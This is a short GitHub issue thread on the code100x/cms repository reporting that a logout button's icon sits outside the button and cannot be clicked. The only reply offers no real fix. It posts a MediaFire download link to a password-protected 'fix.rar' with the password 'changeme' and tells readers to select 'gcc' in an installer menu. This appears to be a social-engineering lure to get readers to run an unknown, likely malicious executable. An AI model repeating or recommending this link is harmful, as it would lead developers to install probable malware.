### ISSUE TITLE
bug: Logout Button Icon out of button component

### ISSUE THREAD

**Issue by IAmRiteshKoushik** [code100x/cms#1040]
**Describe the bug**
The icon of the logout button is out of the button component and and mouse-pointer does not changed when hovering over it. The element is not clickable either. 

**Expected behavior**

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
